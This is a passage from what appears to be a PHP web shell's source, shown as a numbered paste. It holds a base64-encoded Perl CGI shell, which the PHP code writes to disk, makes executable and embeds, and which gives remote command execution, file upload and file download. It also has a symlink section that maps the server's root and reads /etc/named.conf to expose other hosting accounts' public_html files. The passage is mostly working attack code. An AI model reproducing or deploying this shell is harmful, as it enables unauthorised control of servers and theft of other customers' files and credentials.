IHRoZSB1c2VyIHRvIHVwbG9hZCBmaWxlcw0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFByaW50RmlsZVVwbG9hZEZvcm0NCnsNCgkkUHJvbXB0ID0gJFdpbk5UID8gIiRDdXJyZW50RGlyPiAiIDogIlthZG1pblxAJFNlcnZlck5hbWUgJEN1cnJlbnREaXJdXCQgIjsNCglwcmludCA8PEVORDsNCjxjb2RlPg0KPGZvcm0gbmFtZT0iZiIgZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSIgbWV0aG9kPSJQT1NUIiBhY3Rpb249IiRTY3JpcHRMb2NhdGlvbiI+DQokUHJvbXB0IHVwbG9hZDxicj48YnI+DQpGaWxlbmFtZTogPGlucHV0IHR5cGU9ImZpbGUiIG5hbWU9ImYiIHNpemU9IjM1Ij48YnI+PGJyPg0KT3B0aW9uczogJm5ic3A7PGlucHV0IHR5cGU9ImNoZWNrYm94IiBuYW1lPSJvIiB2YWx1ZT0ib3ZlcndyaXRlIj4NCk92ZXJ3cml0ZSBpZiBpdCBFeGlzdHM8YnI+PGJyPg0KVXBsb2FkOiZuYnNwOyZuYnNwOyZuYnNwOzxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJCZWdpbiI+DQo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJkIiB2YWx1ZT0iJEN1cnJlbnREaXIiPg0KPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iYSIgdmFsdWU9InVwbG9hZCI+DQo8L2Zvcm0+DQo8L2NvZGU+DQpFTkQNCn0NCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBUaGlzIGZ1bmN0aW9uIGlzIGNhbGxlZCB3aGVuIHRoZSB0aW1lb3V0IGZvciBhIGNvbW1hbmQgZXhwaXJlcy4gV2UgbmVlZCB0bw0KIyB0ZXJtaW5hdGUgdGhlIHNjcmlwdCBpbW1lZGlhdGVseS4gVGhpcyBmdW5jdGlvbiBpcyB2YWxpZCBvbmx5IG9uIFVuaXguIEl0IGlzDQojIG5ldmVyIGNhbGxlZCB3aGVuIHRoZSBzY3JpcHQgaXMgcnVubmluZyBvbiBOVC4NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBDb21tYW5kVGltZW91dA0Kew0KCWlmKCEkV2luTlQpDQoJew0KCQlhbGFybSgwKTsNCgkJcHJpbnQgPDxFTkQ7DQo8L3htcD4NCjxjb2RlPg0KQ29tbWFuZCBleGNlZWRlZCBtYXhpbXVtIHRpbWUgb2YgJENvbW1hbmRUaW1lb3V0RHVyYXRpb24gc2Vjb25kKHMpLg0KPGJyPktpbGxlZCBpdCENCjxjb2RlPg0KRU5EDQoJCSZQcmludENvbW1hbmRMaW5lSW5wdXRGb3JtOw0KCQkmUHJpbnRQYWdlRm9vdGVyOw0KCQlleGl0Ow0KCX0NCn0NCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBUaGlzIGZ1bmN0aW9uIGlzIGNhbGxlZCB0byBleGVjdXRlIGNvbW1hbmRzLiBJdCBkaXNwbGF5cyB0aGUgb3V0cHV0IG9mIHRoZQ0KIyBjb21tYW5kIGFuZCBhbGxvd3MgdGhlIHVzZXIgdG8gZW50ZXIgYW5vdGhlciBjb21tYW5kLiBUaGUgY2hhbmdlIGRpcmVjdG9yeQ0KIyBjb21tYW5kIGlzIGhhbmRsZWQgZGlmZmVyZW50bHkuIEluIHRoaXMgY2FzZSwgdGhlIG5ldyBkaXJlY3RvcnkgaXMgc3RvcmVkIGluDQojIGFuIGludGVybmFsIHZhcmlhYmxlIGFuZCBpcyB1c2VkIGVhY2ggdGltZSBhIGNvbW1hbmQgaGFzIHRvIGJlIGV4ZWN1dGVkLiBUaGUNCiMgb3V0cHV0IG9mIHRoZSBjaGFuZ2UgZGlyZWN0b3J5IGNvbW1hbmQgaXMgbm90IGRpc3BsYXllZCB0byB0aGUgdXNlcnMNCiMgdGhlcmVmb3JlIGVycm9yIG1lc3NhZ2VzIGNhbm5vdCBiZSBkaXNwbGF5ZWQuDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgRXhlY3V0ZUNvbW1hbmQNCnsNCglpZigkUnVuQ29tbWFuZCA9fiBtL15ccypjZFxzKyguKykvKSAjIGl0IGlzIGEgY2hhbmdlIGRpciBjb21tYW5kDQoJew0KCQkjIHdlIGNoYW5nZSB0aGUgZGlyZWN0b3J5IGludGVybmFsbHkuIFRoZSBvdXRwdXQgb2YgdGhlDQoJCSMgY29tbWFuZCBpcyBub3QgZGlzcGxheWVkLg0KCQkNCgkJJE9sZERpciA9ICRDdXJyZW50RGlyOw0KCQkkQ29tbWFuZCA9ICJjZCBcIiRDdXJyZW50RGlyXCIiLiRDbWRTZXAuImNkICQxIi4kQ21kU2VwLiRDbWRQd2Q7DQoJCWNob3AoJEN1cnJlbnREaXIgPSBgJENvbW1hbmRgKTsNCgkJJlByaW50UGFnZUhlYWRlcigiYyIpOw0KCQkkUHJvbXB0ID0gJFdpbk5UID8gIiRPbGREaXI+ICIgOiAiW2FkbWluXEAkU2VydmVyTmFtZSAkT2xkRGlyXVwkICI7DQoJCXByaW50ICI8Y29kZT4kUHJvbXB0ICRSdW5Db21tYW5kPC9jb2RlPiI7DQoJfQ0KCWVsc2UgIyBzb21lIG90aGVyIGNvbW1hbmQsIGRpc3BsYXkgdGhlIG91dHB1dA0KCXsNCgkJJlByaW50UGFnZUhlYWRlcigiYyIpOw0KCQkkUHJvbXB0ID0gJFdpbk5UID8gIiRDdXJyZW50RGlyPiAiIDogIlthZG1pblxAJFNlcnZlck5hbWUgJEN1cnJlbnREaXJdXCQgIjsNCgkJcHJpbnQgIjxjb2RlPiRQcm9tcHQgJFJ1bkNvbW1hbmQ8L2NvZGU+PHhtcD4iOw0KCQkkQ29tbWFuZCA9ICJjZCBcIiRDdXJyZW50RGlyXCIiLiRDbWRTZXAuJFJ1bkNvbW1hbmQuJFJlZGlyZWN0b3I7DQoJCWlmKCEkV2luTlQpDQoJCXsNCgkJCSRTSUd7J0FMUk0nfSA9IFwmQ29tbWFuZFRpbWVvdXQ7DQoJCQlhbGFybSgkQ29tbWFuZFRpbWVvdXREdXJhdGlvbik7DQoJCX0NCgkJaWYoJFNob3dEeW5hbWljT3V0cHV0KSAjIHNob3cgb3V0cHV0IGFzIGl0IGlzIGdlbmVyYXRlZA0KCQl7DQoJCQkkfD0xOw0KCQkJJENvbW1hbmQgLj0gIiB8IjsNCgkJCW9wZW4oQ29tbWFuZE91dHB1dCwgJENvbW1hbmQpOw0KCQkJd2hpbGUoPENvbW1hbmRPdXRwdXQ+KQ0KCQkJew0KCQkJCSRfID1+IHMvKFxufFxyXG4pJC8vOw0KCQkJCXByaW50ICIkX1xuIjsNCgkJCX0NCgkJCSR8PTA7DQoJCX0NCgkJZWxzZSAjIHNob3cgb3V0cHV0IGFmdGVyIGNvbW1hbmQgY29tcGxldGVzDQoJCXsNCgkJCXByaW50IGAkQ29tbWFuZGA7DQoJCX0NCgkJaWYoISRXaW5OVCkNCgkJew0KCQkJYWxhcm0oMCk7DQoJCX0NCgkJcHJpbnQgIjwveG1wPiI7DQoJfQ0KCSZQcmludENvbW1hbmRMaW5lSW5wdXRGb3JtOw0KCSZQcmludFBhZ2VGb290ZXI7DQp9DQoNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgVGhpcyBmdW5jdGlvbiBkaXNwbGF5cyB0aGUgcGFnZSB0aGF0IGNvbnRhaW5zIGEgbGluayB3aGljaCBhbGxvd3MgdGhlIHVzZXINCiMgdG8gZG93bmxvYWQgdGhlIHNwZWNpZmllZCBmaWxlLiBUaGUgcGFnZSBhbHNvIGNvbnRhaW5zIGEgYXV0by1yZWZyZXNoDQojIGZlYXR1cmUgdGhhdCBzdGFydHMgdGhlIGRvd25sb2FkIGF1dG9tYXRpY2FsbHkuDQojIEFyZ3VtZW50IDE6IEZ1bGx5IHF1YWxpZmllZCBmaWxlbmFtZSBvZiB0aGUgZmlsZSB0byBiZSBkb3dubG9hZGVkDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgUHJpbnREb3dubG9hZExpbmtQYWdlDQp7DQoJbG9jYWwoJEZpbGVVcmwpID0gQF87DQoJaWYoLWUgJEZpbGVVcmwpICMgaWYgdGhlIGZpbGUgZXhpc3RzDQoJew0KCQkjIGVuY29kZSB0aGUgZmlsZSBsaW5rIHNvIHdlIGNhbiBzZW5kIGl0IHRvIHRoZSBicm93c2VyDQoJCSRGaWxlVXJsID1+IHMvKFteYS16QS1aMC05XSkvJyUnLnVucGFjaygiSCoiLCQxKS9lZzsNCgkJJERvd25sb2FkTGluayA9ICIkU2NyaXB0TG9jYXRpb24/YT1kb3dubG9hZCZmPSRGaWxlVXJsJm89Z28iOw0KCQkkSHRtbE1ldGFIZWFkZXIgPSAiPG1ldGEgSFRUUC1FUVVJVj1cIlJlZnJlc2hcIiBDT05URU5UPVwiMTsgVVJMPSREb3dubG9hZExpbmtcIj4iOw0KCQkmUHJpbnRQYWdlSGVhZGVyKCJjIik7DQoJCXByaW50IDw8RU5EOw0KPGNvZGU+DQpTZW5kaW5nIEZpbGUgJFRyYW5zZmVyRmlsZS4uLjxicj4NCklmIHRoZSBkb3dubG9hZCBkb2VzIG5vdCBzdGFydCBhdXRvbWF0aWNhbGx5LA0KPGEgaHJlZj0iJERvd25sb2FkTGluayI+Q2xpY2sgSGVyZTwvYT4uDQo8L2NvZGU+DQpFTkQNCgkJJlByaW50Q29tbWFuZExpbmVJbnB1dEZvcm07DQoJCSZQcmludFBhZ2VGb290ZXI7DQoJfQ0KCWVsc2UgIyBmaWxlIGRvZXNuJ3QgZXhpc3QNCgl7DQoJCSZQcmludFBhZ2VIZWFkZXIoImYiKTsNCgkJcHJpbnQgIjxjb2RlPkZhaWxlZCB0byBkb3dubG9hZCAkRmlsZVVybDogJCE8L2NvZGU+IjsNCgkJJlByaW50RmlsZURvd25sb2FkRm9ybTsNCgkJJlByaW50UGFnZUZvb3RlcjsNCgl9DQp9DQoNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgVGhpcyBmdW5jdGlvbiByZWFkcyB0aGUgc3BlY2lmaWVkIGZpbGUgZnJvbSB0aGUgZGlzayBhbmQgc2VuZHMgaXQgdG8gdGhlDQojIGJyb3dzZXIsIHNvIHRoYXQgaXQgY2FuIGJlIGRvd25sb2FkZWQgYnkgdGhlIHVzZXIuDQojIEFyZ3VtZW50IDE6IEZ1bGx5IHF1YWxpZmllZCBwYXRobmFtZSBvZiB0aGUgZmlsZSB0byBiZSBzZW50Lg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFNlbmRGaWxlVG9Ccm93c2VyDQp7DQoJbG9jYWwoJFNlbmRGaWxlKSA9IEBfOw0KCWlmKG9wZW4oU0VOREZJTEUsICRTZW5kRmlsZSkpICMgZmlsZSBvcGVuZWQgZm9yIHJlYWRpbmcNCgl7DQoJCWlmKCRXaW5OVCkNCgkJew0KCQkJYmlubW9kZShTRU5ERklMRSk7DQoJCQliaW5tb2RlKFNURE9VVCk7DQoJCX0NCgkJJEZpbGVTaXplID0gKHN0YXQoJFNlbmRGaWxlKSlbN107DQoJCSgkRmlsZW5hbWUgPSAkU2VuZEZpbGUpID1+ICBtIShbXi9eXFxdKikkITsNCgkJcHJpbnQgIkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC11bmtub3duXG4iOw0KCQlwcmludCAiQ29udGVudC1MZW5ndGg6ICRGaWxlU2l6ZVxuIjsNCgkJcHJpbnQgIkNvbnRlbnQtRGlzcG9zaXRpb246IGF0dGFjaG1lbnQ7IGZpbGVuYW1lPSQxXG5cbiI7DQoJCXByaW50IHdoaWxlKDxTRU5ERklMRT4pOw0KCQljbG9zZShTRU5ERklMRSk7DQoJfQ0KCWVsc2UgIyBmYWlsZWQgdG8gb3BlbiBmaWxlDQoJew0KCQkmUHJpbnRQYWdlSGVhZGVyKCJmIik7DQoJCXByaW50ICI8Y29kZT5GYWlsZWQgdG8gZG93bmxvYWQgJFNlbmRGaWxlOiAkITwvY29kZT4iOw0KCQkmUHJpbnRGaWxlRG93bmxvYWRGb3JtOw0KCQkmUHJpbnRQYWdlRm9vdGVyOw0KCX0NCn0NCg0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFRoaXMgZnVuY3Rpb24gaXMgY2FsbGVkIHdoZW4gdGhlIHVzZXIgZG93bmxvYWRzIGEgZmlsZS4gSXQgZGlzcGxheXMgYSBtZXNzYWdlDQojIHRvIHRoZSB1c2VyIGFuZCBwcm92aWRlcyBhIGxpbmsgdGhyb3VnaCB3aGljaCB0aGUgZmlsZSBjYW4gYmUgZG93bmxvYWRlZC4NCiMgVGhpcyBmdW5jdGlvbiBpcyBhbHNvIGNhbGxlZCB3aGVuIHRoZSB1c2VyIGNsaWNrcyBvbiB0aGF0IGxpbmsuIEluIHRoaXMgY2FzZSwNCiMgdGhlIGZpbGUgaXMgcmVhZCBhbmQgc2VudCB0byB0aGUgYnJvd3Nlci4NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBCZWdpbkRvd25sb2FkDQp7DQoJIyBnZXQgZnVsbHkgcXVhbGlmaWVkIHBhdGggb2YgdGhlIGZpbGUgdG8gYmUgZG93bmxvYWRlZA0KCWlmKCgkV2luTlQgJiAoJFRyYW5zZmVyRmlsZSA9fiBtL15cXHxeLjovKSkgfA0KCQkoISRXaW5OVCAmICgkVHJhbnNmZXJGaWxlID1+IG0vXlwvLykpKSAjIHBhdGggaXMgYWJzb2x1dGUNCgl7DQoJCSRUYXJnZXRGaWxlID0gJFRyYW5zZmVyRmlsZTsNCgl9DQoJZWxzZSAjIHBhdGggaXMgcmVsYXRpdmUNCgl7DQoJCWNob3AoJFRhcmdldEZpbGUpIGlmKCRUYXJnZXRGaWxlID0gJEN1cnJlbnREaXIpID1+IG0vW1xcXC9dJC87DQoJCSRUYXJnZXRGaWxlIC49ICRQYXRoU2VwLiRUcmFuc2ZlckZpbGU7DQoJfQ0KDQoJaWYoJE9wdGlvbnMgZXEgImdvIikgIyB3ZSBoYXZlIHRvIHNlbmQgdGhlIGZpbGUNCgl7DQoJCSZTZW5kRmlsZVRvQnJvd3NlcigkVGFyZ2V0RmlsZSk7DQoJfQ0KCWVsc2UgIyB3ZSBoYXZlIHRvIHNlbmQgb25seSB0aGUgbGluayBwYWdlDQoJew0KCQkmUHJpbnREb3dubG9hZExpbmtQYWdlKCRUYXJnZXRGaWxlKTsNCgl9DQp9DQoNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgVGhpcyBmdW5jdGlvbiBpcyBjYWxsZWQgd2hlbiB0aGUgdXNlciB3YW50cyB0byB1cGxvYWQgYSBmaWxlLiBJZiB0aGUNCiMgZmlsZSBpcyBub3Qgc3BlY2lmaWVkLCBpdCBkaXNwbGF5cyBhIGZvcm0gYWxsb3dpbmcgdGhlIHVzZXIgdG8gc3BlY2lmeSBhDQojIGZpbGUsIG90aGVyd2lzZSBpdCBzdGFydHMgdGhlIHVwbG9hZCBwcm9jZXNzLg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFVwbG9hZEZpbGUNCnsNCgkjIGlmIG5vIGZpbGUgaXMgc3BlY2lmaWVkLCBwcmludCB0aGUgdXBsb2FkIGZvcm0gYWdhaW4NCglpZigkVHJhbnNmZXJGaWxlIGVxICIiKQ0KCXsNCgkJJlByaW50UGFnZUhlYWRlcigiZiIpOw0KCQkmUHJpbnRGaWxlVXBsb2FkRm9ybTsNCgkJJlByaW50UGFnZUZvb3RlcjsNCgkJcmV0dXJuOw0KCX0NCgkmUHJpbnRQYWdlSGVhZGVyKCJjIik7DQoNCgkjIHN0YXJ0IHRoZSB1cGxvYWRpbmcgcHJvY2Vzcw0KCXByaW50ICI8Y29kZT5VcGxvYWRpbmcgJFRyYW5zZmVyRmlsZSB0byAkQ3VycmVudERpci4uLjxicj4iOw0KDQoJIyBnZXQgdGhlIGZ1bGxseSBxdWFsaWZpZWQgcGF0aG5hbWUgb2YgdGhlIGZpbGUgdG8gYmUgY3JlYXRlZA0KCWNob3AoJFRhcmdldE5hbWUpIGlmICgkVGFyZ2V0TmFtZSA9ICRDdXJyZW50RGlyKSA9fiBtL1tcXFwvXSQvOw0KCSRUcmFuc2ZlckZpbGUgPX4gbSEoW14vXlxcXSopJCE7DQoJJFRhcmdldE5hbWUgLj0gJFBhdGhTZXAuJDE7DQoNCgkkVGFyZ2V0RmlsZVNpemUgPSBsZW5ndGgoJGlueydmaWxlZGF0YSd9KTsNCgkjIGlmIHRoZSBmaWxlIGV4aXN0cyBhbmQgd2UgYXJlIG5vdCBzdXBwb3NlZCB0byBvdmVyd3JpdGUgaXQNCglpZigtZSAkVGFyZ2V0TmFtZSAmJiAkT3B0aW9ucyBuZSAib3ZlcndyaXRlIikNCgl7DQoJCXByaW50ICJGYWlsZWQ6IERlc3RpbmF0aW9uIGZpbGUgYWxyZWFkeSBleGlzdHMuPGJyPiI7DQoJfQ0KCWVsc2UgIyBmaWxlIGlzIG5vdCBwcmVzZW50DQoJew0KCQlpZihvcGVuKFVQTE9BREZJTEUsICI+JFRhcmdldE5hbWUiKSkNCgkJew0KCQkJYmlubW9kZShVUExPQURGSUxFKSBpZiAkV2luTlQ7DQoJCQlwcmludCBVUExPQURGSUxFICRpbnsnZmlsZWRhdGEnfTsNCgkJCWNsb3NlKFVQTE9BREZJTEUpOw0KCQkJcHJpbnQgIlRyYW5zZmVyZWQgJFRhcmdldEZpbGVTaXplIEJ5dGVzLjxicj4iOw0KCQkJcHJpbnQgIkZpbGUgUGF0aDogJFRhcmdldE5hbWU8YnI+IjsNCgkJfQ0KCQllbHNlDQoJCXsNCgkJCXByaW50ICJGYWlsZWQ6ICQhPGJyPiI7DQoJCX0NCgl9DQoJcHJpbnQgIjwvY29kZT4iOw0KCSZQcmludENvbW1hbmRMaW5lSW5wdXRGb3JtOw0KCSZQcmludFBhZ2VGb290ZXI7DQp9DQoNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgVGhpcyBmdW5jdGlvbiBpcyBjYWxsZWQgd2hlbiB0aGUgdXNlciB3YW50cyB0byBkb3dubG9hZCBhIGZpbGUuIElmIHRoZQ0KIyBmaWxlbmFtZSBpcyBub3Qgc3BlY2lmaWVkLCBpdCBkaXNwbGF5cyBhIGZvcm0gYWxsb3dpbmcgdGhlIHVzZXIgdG8gc3BlY2lmeSBhDQojIGZpbGUsIG90aGVyd2lzZSBpdCBkaXNwbGF5cyBhIG1lc3NhZ2UgdG8gdGhlIHVzZXIgYW5kIHByb3ZpZGVzIGEgbGluaw0KIyB0aHJvdWdoICB3aGljaCB0aGUgZmlsZSBjYW4gYmUgZG93bmxvYWRlZC4NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBEb3dubG9hZEZpbGUNCnsNCgkjIGlmIG5vIGZpbGUgaXMgc3BlY2lmaWVkLCBwcmludCB0aGUgZG93bmxvYWQgZm9ybSBhZ2Fpbg0KCWlmKCRUcmFuc2ZlckZpbGUgZXEgIiIpDQoJew0KCQkmUHJpbnRQYWdlSGVhZGVyKCJmIik7DQoJCSZQcmludEZpbGVEb3dubG9hZEZvcm07DQoJCSZQcmludFBhZ2VGb290ZXI7DQoJCXJldHVybjsNCgl9DQoJDQoJIyBnZXQgZnVsbHkgcXVhbGlmaWVkIHBhdGggb2YgdGhlIGZpbGUgdG8gYmUgZG93bmxvYWRlZA0KCWlmKCgkV2luTlQgJiAoJFRyYW5zZmVyRmlsZSA9fiBtL15cXHxeLjovKSkgfA0KCQkoISRXaW5OVCAmICgkVHJhbnNmZXJGaWxlID1+IG0vXlwvLykpKSAjIHBhdGggaXMgYWJzb2x1dGUNCgl7DQoJCSRUYXJnZXRGaWxlID0gJFRyYW5zZmVyRmlsZTsNCgl9DQoJZWxzZSAjIHBhdGggaXMgcmVsYXRpdmUNCgl7DQoJCWNob3AoJFRhcmdldEZpbGUpIGlmKCRUYXJnZXRGaWxlID0gJEN1cnJlbnREaXIpID1+IG0vW1xcXC9dJC87DQoJCSRUYXJnZXRGaWxlIC49ICRQYXRoU2VwLiRUcmFuc2ZlckZpbGU7DQoJfQ0KDQoJaWYoJE9wdGlvbnMgZXEgImdvIikgIyB3ZSBoYXZlIHRvIHNlbmQgdGhlIGZpbGUNCgl7DQoJCSZTZW5kRmlsZVRvQnJvd3NlcigkVGFyZ2V0RmlsZSk7DQoJfQ0KCWVsc2UgIyB3ZSBoYXZlIHRvIHNlbmQgb25seSB0aGUgbGluayBwYWdlDQoJew0KCQkmUHJpbnREb3dubG9hZExpbmtQYWdlKCRUYXJnZXRGaWxlKTsNCgl9DQp9DQoNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgTWFpbiBQcm9ncmFtIC0gRXhlY3V0aW9uIFN0YXJ0cyBIZXJlDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQomUmVhZFBhcnNlOw0KJkdldENvb2tpZXM7DQoNCiRTY3JpcHRMb2NhdGlvbiA9ICRFTlZ7J1NDUklQVF9OQU1FJ307DQokU2VydmVyTmFtZSA9ICRFTlZ7J1NFUlZFUl9OQU1FJ307DQokTG9naW5QYXNzd29yZCA9ICRpbnsncCd9Ow0KJFJ1bkNvbW1hbmQgPSAkaW57J2MnfTsNCiRUcmFuc2ZlckZpbGUgPSAkaW57J2YnfTsNCiRPcHRpb25zID0gJGlueydvJ307DQoNCiRBY3Rpb24gPSAkaW57J2EnfTsNCiRBY3Rpb24gPSAibG9naW4iIGlmKCRBY3Rpb24gZXEgIiIpOyAjIG5vIGFjdGlvbiBzcGVjaWZpZWQsIHVzZSBkZWZhdWx0DQoNCiMgZ2V0IHRoZSBkaXJlY3RvcnkgaW4gd2hpY2ggdGhlIGNvbW1hbmRzIHdpbGwgYmUgZXhlY3V0ZWQNCiRDdXJyZW50RGlyID0gJGlueydkJ307DQpjaG9wKCRDdXJyZW50RGlyID0gYCRDbWRQd2RgKSBpZigkQ3VycmVudERpciBlcSAiIik7DQoNCiRMb2dnZWRJbiA9ICRDb29raWVzeydTQVZFRFBXRCd9IGVxICRQYXNzd29yZDsNCg0KaWYoJEFjdGlvbiBlcSAibG9naW4iIHx8ICEkTG9nZ2VkSW4pICMgdXNlciBuZWVkcy9oYXMgdG8gbG9naW4NCnsNCgkmUGVyZm9ybUxvZ2luOw0KfQ0KZWxzaWYoJEFjdGlvbiBlcSAiY29tbWFuZCIpICMgdXNlciB3YW50cyB0byBydW4gYSBjb21tYW5kDQp7DQoJJkV4ZWN1dGVDb21tYW5kOw0KfQ0KZWxzaWYoJEFjdGlvbiBlcSAidXBsb2FkIikgIyB1c2VyIHdhbnRzIHRvIHVwbG9hZCBhIGZpbGUNCnsNCgkmVXBsb2FkRmlsZTsNCn0NCmVsc2lmKCRBY3Rpb24gZXEgImRvd25sb2FkIikgIyB1c2VyIHdhbnRzIHRvIGRvd25sb2FkIGEgZmlsZQ0Kew0KCSZEb3dubG9hZEZpbGU7DQp9DQplbHNpZigkQWN0aW9uIGVxICJsb2dvdXQiKSAjIHVzZXIgd2FudHMgdG8gbG9nb3V0DQp7DQoJJlBlcmZvcm1Mb2dvdXQ7DQp9DQoNCg0K
  2596.  
  2597. ";
  2598. $ashiyane6 = fopen('cgi.ashiyane','w+');
  2599. $ashiyane7 = fwrite ($ashiyane6 ,base64_decode($ashiyane5));
  2600. fclose($ashiyane6);
  2601. chmod('cgi.ashiyane',0755);
  2602. echo '<a name="down"></a><iframe src=cgiashiyane/cgi.ashiyane width=100% height=600px frameborder=0></iframe> ';
  2603.  
  2604.    
  2605.        
  2606.     }
  2607.    
  2608.     if($action=="sym"){
  2609.         echo "<style>#sym{background: #A81F1F}</style>";
  2610.        
  2611.         ?>
  2612.         <div style="font-size:20px">
  2613.         <center>
  2614.         <a href="?action=sym&sym=dsym"><input type="button" value="Domains"></a>
  2615.         <a href="?action=sym&sym=dusym"><input type="button" value="Domains User Symlink"></a>
  2616.         <a href="?action=sym&sym=passwd"><input type="button" value="Passwd Symlink"></a>
  2617.         <a href="?action=sym&sym=fsym"><input type="button" value="File Symlinker"></a>
  2618.         <a href="?action=sym&sym=dasym"><input type="button" value="Direct Admin Symlink"></a>
  2619.         </center>
  2620.         <br /><br />
  2621.         </div>
  2622.         <?php
  2623.     if(isset($_GET['sym']) && $_GET['sym']=="dusym"){
  2624.     if(!@file_exists("/etc/virtual/domainowners")){
  2625. @set_time_limit(0);
  2626. echo "<center>";
  2627. @mkdir('sym',0777);
  2628. $ht = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
  2629. $htfile =@fopen ('sym/.htaccess','w');
  2630. fwrite($htfile ,$ht);
  2631. @symlink('/','sym/root');
  2632. $basename = basename('_FILE_');
  2633. $namedfile = @file('/etc/named.conf');
  2634. if(!$namedfile)
  2635. {
  2636. echo "<b><font color=\"#FFFFFF\">Cant access /etc/named.conf on server</b></font></center>";
  2637. }
  2638. else
  2639. {
  2640. echo "<br>";
  2641. echo "<table align='center' width='40%' class='syms'>
  2642. <td><font color=\"#FFFFFF\"><b><center># Count</center></font></b></td>
  2643. <td><font color=\"#FFFFFF\"><b><center>Domains</center></font></b></td>
  2644. <td><font color=\"#FFFFFF\"><b><center>Users</center></font></b></td>
  2645. <td><font color=\"#FFFFFF\"><b><center>symlink</center></font></b></td>";
  2646. $count=1;
  2647. foreach($namedfile as $namedfiles){
  2648. if(@eregi('zone',$namedfiles)){
  2649. preg_match_all('#zone "(.*)"#',$namedfiles,$namedfiles2);
  2650. flush();
  2651. if(strlen(trim($namedfiles2[1][0])) >2){
  2652. $valiasesfile = posix_getpwuid(@fileowner('/etc/valiases/'.$namedfiles2[1][0]));
  2653. $valiasfilename = $valiasesfile['name'];
  2654. @symlink('/','sym/root');
  2655. $valiasfilename = $namedfiles2[1][0];
  2656. $irdom = '\.ir';
  2657. $ildom = '\.il';
  2658. if (@eregi("$irdom",$namedfiles2[1][0]) or @eregi("$ildom",$namedfiles2[1][0]) ){
  2659. $valiasfilename = "<b><font style=\"color:#FFFFFF\">".$namedfiles2[1][0].'</font></b>';
  2660. }
  2661. echo "<tr><td><font color=\"#FFFFFF\">{$count}</font></td><td><a target='_blank' href=http://www.".$namedfiles2[1][0].'/><font color=#FFFFFF><b>'.$valiasfilename.'</b> </a></font></td><td><font color="white"><b>'.$valiasesfile['name']."</font></b></td><td><a href='sym/root/home/".$valiasesfile['name']."/public_html' target='_blank'><font color=\"#FF0000\">symlink </font></a></td></tr>";flush();
  2662. $count++;}}}}
  2663. } else {
  2664. echo '<center><br><font color="#FFFFFF">This is Server DirectAdmin Use </font><font color="#FF0000"><a href="?action=sym&sym=dasym">Symlink for Direct Admin</a></font></b></center> ';
  2665. }
  2666. echo "</center></table>";
